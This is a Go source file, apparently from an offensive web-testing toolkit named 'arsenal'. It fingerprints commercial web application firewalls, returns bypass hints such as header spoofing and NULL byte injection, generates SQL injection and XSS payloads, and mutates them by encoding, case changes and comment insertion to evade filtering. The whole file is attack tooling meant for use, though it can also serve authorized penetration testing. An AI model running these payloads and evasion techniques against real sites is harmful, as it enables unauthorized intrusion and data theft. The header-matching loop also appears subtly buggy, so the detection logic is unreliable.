package arsenal

import (
	"context"
	"fmt"
	"math/rand"
	"strings"
	"sync"
	"time"
)

type WAFFingerprint struct {
	Name         string
	Patterns     []string
	ResponseCodes []int
	Headers      map[string]string
	BlockPage    string
}

type WAFResult struct {
	Detected    bool
	Name        string
	Confidence  float64
	Indicators  []string
	BypassHints []string
}

type WAFFingerprinter struct {
	signatures []WAFFingerprint
}

func NewWAFFingerprinter() *WAFFingerprinter {
	return &WAFFingerprinter{signatures: defaultSignatures()}
}

func defaultSignatures() []WAFFingerprint {
	return []WAFFingerprint{
		{
			Name: "Cloudflare",
			Patterns: []string{"cf-ray", "__cfduid", "cloudflare-nginx", "cf-chl-bypass"},
			ResponseCodes: []int{403, 503},
			Headers: map[string]string{"Server": "cloudflare", "CF-RAY": ""},
			BlockPage: "Attention Required! | Cloudflare",
		},
		{
			Name: "AWS WAF",
			Patterns: []string{"x-amzn-RequestId", "AWSALB", "awselb"},
			ResponseCodes: []int{403},
			Headers: map[string]string{"X-Amzn-RequestId": "", "Server": "awselb"},
			BlockPage: "Request blocked",
		},
		{
			Name: "ModSecurity",
			Patterns: []string{"Mod_Security", "This error was generated by Mod_Security", "mod_security"},
			ResponseCodes: []int{403, 406},
			Headers: map[string]string{"Server": "Apache"},
			BlockPage: "Not Acceptable",
		},
		{
			Name: "Imperva",
			Patterns: []string{"X-Imperva", "incapsula", "visid_incap", "_incap_"},
			ResponseCodes: []int{403},
			Headers: map[string]string{"X-CDN": "Incapsula", "X-Iinfo": ""},
			BlockPage: "",
		},
		{
			Name: "F5 BIG-IP ASM",
			Patterns: []string{"X-WA-Info", "F5-TrafficShield", "TS"},
			ResponseCodes: []int{403},
			Headers: map[string]string{"Server": "BigIP"},
			BlockPage: "The requested URL was rejected",
		},
		{
			Name: "Akamai",
			Patterns: []string{"X-Akamai-Transformed", "akamai-origin-hop"},
			ResponseCodes: []int{403, 503},
			Headers: map[string]string{"Server": "AkamaiGHost"},
			BlockPage: "Access Denied",
		},
		{
			Name: "Fortinet FortiWeb",
			Patterns: []string{"FortiWeb", "cookietest=1"},
			ResponseCodes: []int{403},
			Headers: map[string]string{"Set-Cookie": "cookietest=1"},
			BlockPage: "Attack detected",
		},
	}
}

func (f *WAFFingerprinter) Fingerprint(headers map[string]string, body string, statusCode int) *WAFResult {
	var bestMatch *WAFResult
	bestScore := 0.0

	for _, sig := range f.signatures {
		score := 0.0
		indicators := make([]string, 0)
		count := 0

		for _, key := range sig.Headers {
			for hk, hv := range headers {
				if strings.EqualFold(hk, key) && (sig.Headers[key] == "" || strings.Contains(strings.ToLower(hv), strings.ToLower(sig.Headers[key]))) {
					score += 1.0
					indicators = append(indicators, fmt.Sprintf("header:%s=%s", hk, hv))
					break
				}
			}
			count++
		}

		for _, pattern := range sig.Patterns {
			if strings.Contains(strings.ToLower(body), strings.ToLower(pattern)) {
				score += 1.0
				indicators = append(indicators, fmt.Sprintf("body:%s", pattern))
			}
			count++
		}

		for _, code := range sig.ResponseCodes {
			if statusCode == code {
				score += 0.5
				indicators = append(indicators, fmt.Sprintf("status:%d", code))
			}
			count++
		}

		if count > 0 {
			confidence := (score * 2.0) / float64(count)
			if confidence > bestScore {
				bestScore = confidence
				hints := generateBypassHints(sig)
				bestMatch = &WAFResult{
					Detected:    confidence > 0.3,
					Name:        sig.Name,
					Confidence:  confidence,
					Indicators:  indicators,
					BypassHints: hints,
				}
			}
		}
	}

	if bestMatch == nil {
		return &WAFResult{Detected: false, Name: "Unknown"}
	}
	return bestMatch
}

func generateBypassHints(sig WAFFingerprint) []string {
	hints := []string{
		"Use HTTP parameter pollution (HPP)",
		"Try chunked transfer encoding",
		"Use Unicode/UTF-8 encoding variants",
		"Try HTTP/2 or HTTP/1.0 downgrade",
	}
	switch strings.ToLower(sig.Name) {
	case "cloudflare":
		hints = append(hints, "Try Cloudflare origin IP discovery via DNS history", "Use CF-Connecting-IP header spoofing")
	case "aws waf":
		hints = append(hints, "Try oversized headers (>8KB)", "Use AWS-specific encoding bypasses")
	case "modsecurity":
		hints = append(hints, "Try multipart/form-data boundary tricks", "Use NULL byte injection in parameters")
	}
	return hints
}

type PayloadGenerator interface {
	Generate(input string) []string
	Name() string
	Category() string
}

type SQLiGenerator struct{}

func (g *SQLiGenerator) Name() string     { return "SQLi Payload Generator" }
func (g *SQLiGenerator) Category() string  { return "INJECTION" }
func (g *SQLiGenerator) Generate(input string) []string {
	payloads := []string{
		"' OR '1'='1",
		"' OR 1=1--",
		"' UNION SELECT NULL--",
		"' OR '1'='1' /*",
		"admin'--",
		"' OR 1=1#",
		"1' OR '1'='1",
	}
	return payloads
}

type XSSGenerator struct{}

func (g *XSSGenerator) Name() string     { return "XSS Payload Generator" }
func (g *XSSGenerator) Category() string  { return "INJECTION" }
func (g *XSSGenerator) Generate(input string) []string {
	payloads := []string{
		"<script>alert(1)</script>",
		"<img src=x onerror=alert(1)>",
		"<svg onload=alert(1)>",
		"javascript:alert(1)",
		"\" onfocus=alert(1) autofocus=\"",
	}
	return payloads
}

type WAFMutator struct {
	techniques []string
	rng        *rand.Rand
}

func NewWAFMutator() *WAFMutator {
	return &WAFMutator{
		techniques: []string{"case", "encoding", "concat", "comment", "whitespace"},
		rng:        rand.New(rand.NewSource(time.Now().UnixNano())),
	}
}

func (m *WAFMutator) Mutate(payload string) []string {
	var variants []string

	variants = append(variants, payload)
	variants = append(variants, mutateCase(payload))
	variants = append(variants, mutateEncoding(payload))
	variants = append(variants, mutateConcat(payload))
	variants = append(variants, mutateComment(payload))
	variants = append(variants, mutateWhitespace(payload))

	return variants
}

func (m *WAFMutator) MutateBatch(payloads []string) map[string][]string {
	result := make(map[string][]string)
	for _, p := range payloads {
		result[p] = m.Mutate(p)
	}
	return result
}

func mutateCase(payload string) string {
	var sb strings.Builder
	for _, c := range payload {
		if c >= 'a' && c <= 'z' {
			if rand.Intn(2) == 0 {
				sb.WriteByte(byte(c - 32))
			} else {
				sb.WriteByte(byte(c))
			}
		} else {
			sb.WriteByte(byte(c))
		}
	}
	return sb.String()
}

func mutateEncoding(payload string) string {
	var sb strings.Builder
	for _, c := range payload {
		sb.WriteString(fmt.Sprintf("%%%02x", c))
	}
	return sb.String()
}

func mutateConcat(payload string) string {
	if len(payload) < 4 {
		return payload
	}
	mid := len(payload) / 2
	return fmt.Sprintf("%s||%s", payload[:mid], payload[mid:])
}

func mutateComment(payload string) string {
	var sb strings.Builder
	for i, c := range payload {
		sb.WriteRune(c)
		if i < len(payload)-1 && rand.Intn(3) == 0 {
			sb.WriteString("/**/")
		}
	}
	return sb.String()
}

func mutateWhitespace(payload string) string {
	ws := []string{" ", "\t", "\n", "\r", "%09", "%0a", "%0d", "/**/"}
	var sb strings.Builder
	for i, c := range payload {
		if c == ' ' {
			sb.WriteString(ws[rand.Intn(len(ws))])
		} else {
			sb.WriteRune(c)
		}
		_ = i
	}
	return sb.String()
}

type Sandbox struct {
	payloads []string
	mu       sync.Mutex
}

func NewSandbox() *Sandbox {
	return &Sandbox{payloads: make([]string, 0)}
}

func (s *Sandbox) Load(payload string) {
	s.mu.Lock()
	defer s.mu.Unlock()
	s.payloads = append(s.payloads, payload)
}

func (s *Sandbox) Execute(ctx context.Context, fn func(payload string) (string, error)) []SandboxResult {
	s.mu.Lock()
	items := make([]string, len(s.payloads))
	copy(items, s.payloads)
	s.payloads = s.payloads[:0]
	s.mu.Unlock()

	var results []SandboxResult
	for _, p := range items {
		select {
		case <-ctx.Done():
			results = append(results, SandboxResult{Payload: p, Error: ctx.Err().Error()})
			continue
		default:
		}
		output, err := fn(p)
		results = append(results, SandboxResult{Payload: p, Output: output, Error: errToString(err)})
	}
	return results
}

type SandboxResult struct {
	Payload string
	Output  string
	Error   string
}

func errToString(err error) string {
	if err == nil {
		return ""
	}
	return err.Error()
}
